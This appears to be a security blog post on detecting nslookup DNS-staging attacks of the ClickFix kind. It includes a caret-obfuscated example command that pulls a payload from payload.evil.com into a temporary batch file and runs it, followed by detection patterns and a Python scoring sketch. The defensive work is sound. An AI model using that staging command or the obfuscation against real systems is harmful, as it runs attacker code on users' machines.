Detection Engineering | February 2026

nslookup DNS Staging — Detecting the Technique Microsoft Disclosed

Microsoft disclosed a new ClickFix technique that abuses DNS lookups to smuggle payloads past traditional security tools. Attackers encode commands in DNS TXT records, retrieve them with nslookup, and parse the output into executable code — all with caret obfuscation to evade pattern matching.

The Technique

The payload pipes nslookup output through findstr to extract encoded commands from DNS TXT records, then uses for /f "tokens" parsing to isolate the payload and execute it. The DNS query goes to an attacker-controlled nameserver, and the TXT record contains the encoded malicious command.

A second layer of evasion uses caret obfuscation — inserting ^ characters between every letter of a command. Windows CMD silently strips carets during parsing, so n^s^l^o^o^k^u^p executes identically to nslookup, but no regex looking for the word "nslookup" will match.

c^m^d /c n^s^l^o^o^k^u^p -type=txt payload.evil.com 8.8.8.8 | f^i^n^d^s^t^r "exec" > %temp%\r.bat && %temp%\r.bat

How We Added Detection

Fifteen new patterns were added to the clipboard scoring engine, split between critical (auto-block) and supporting (boost the score only when combined with other matches):

Critical patterns: nslookup ... | findstr (DNS output filtering, 90 pts), nslookup ... | for /f (DNS output parsing into execution, 90 pts), cmd /c ... nslookup (cmd wrapping nslookup, 85 pts), and caret-obfuscated variants of nslookup, powershell, cmd, mshta, and findstr (75–90 pts each).

Supporting patterns: bare nslookup presence (+20), findstr presence (+15), for /f "tokens parsing (+20), && exit run-and-close pattern (+15), and nslookup with explicit DNS server IP (+25, supporting only to avoid flagging legitimate DNS queries).

A legitimate nslookup google.com scores 20 (clean). A legitimate nslookup example.com 8.8.8.8 scores 30 (suspicious, not blocked). Microsoft's exact disclosed command pattern scores 100 (blocked). The caret-obfuscated variant also scores 100.
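The scoring logic described above, as an added example that is not DiTM's engine: caret normalization, the critical and supporting patterns with the point values the post lists, and a verdict. Additive scoring capped at 100, the clean/suspicious threshold of 25 and the 85-point weight for caret-obfuscated tool names are assumptions, so totals for mixed commands such as nslookup with an explicit server IP come out differently from the post's figures.

```python
import re

# Added example, not DiTM's engine. Point values are the ones the post lists;
# additive scoring capped at 100 and the verdict thresholds are assumptions.

def normalize(cmd: str) -> str:
    """Undo caret obfuscation: CMD treats '^' as an escape for the next
    character, so 'n^s^l^o^o^k^u^p' parses as 'nslookup'. (Carets inside
    double quotes are literal in CMD; stripping them there too only makes
    the matcher more aggressive, which is acceptable for detection.)"""
    return re.sub(r"\^(.)", r"\1", cmd).lower()

# Critical patterns: any match auto-blocks. Matched against the normalized command.
CRITICAL = [
    (r"nslookup\b.*\|\s*findstr\b", 90, "nslookup piped to findstr"),
    (r"nslookup\b.*\|\s*for\s+/f\b", 90, "nslookup piped to for /f"),
    (r"cmd(\.exe)?\s+/c\b.*nslookup\b", 85, "cmd /c wrapping nslookup"),
]
# Tools whose caret-obfuscated spelling is itself critical (post: 75-90 pts; 85 assumed).
OBFUSCATED_TOOLS = ["nslookup", "powershell", "cmd", "mshta", "findstr"]
OBFUSCATED_PTS = 85

# Supporting patterns: boost the score only.
SUPPORTING = [
    (r"\bnslookup\b", 20, "nslookup present"),
    (r"\bfindstr\b", 15, "findstr present"),
    (r'for\s+/f\s+"tokens', 20, 'for /f "tokens parsing'),
    (r"&&\s*exit\b", 15, "&& exit run-and-close"),
    (r"nslookup\b[^|&]*\b\d{1,3}(?:\.\d{1,3}){3}\b", 25, "nslookup with explicit DNS server IP"),
]

def score(cmd: str) -> dict:
    """Score one clipboard payload: points, verdict and the names of matched patterns."""
    raw, norm = cmd.lower(), normalize(cmd)
    hits = [(name, pts, True) for pat, pts, name in CRITICAL if re.search(pat, norm)]
    # A tool name that appears only after de-careting was caret-obfuscated.
    hits += [(f"caret-obfuscated {t}", OBFUSCATED_PTS, True) for t in OBFUSCATED_TOOLS
             if re.search(rf"\b{t}\b", norm) and not re.search(rf"\b{t}\b", raw)]
    hits += [(name, pts, False) for pat, pts, name in SUPPORTING if re.search(pat, norm)]
    total = min(sum(p for _, p, _ in hits), 100)
    critical = any(c for _, _, c in hits)
    verdict = "blocked" if critical else "suspicious" if total >= 25 else "clean"
    return {"score": total, "verdict": verdict, "hits": [n for n, _, _ in hits]}
```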

Detection Status

Both clean and caret-obfuscated nslookup DNS staging techniques are detected and blocked. The supporting pattern for explicit DNS server IP was initially set too aggressively as a critical pattern — it was moved to supporting-only after testing showed false positives on benign diagnostic commands.

DiTM Security © 2026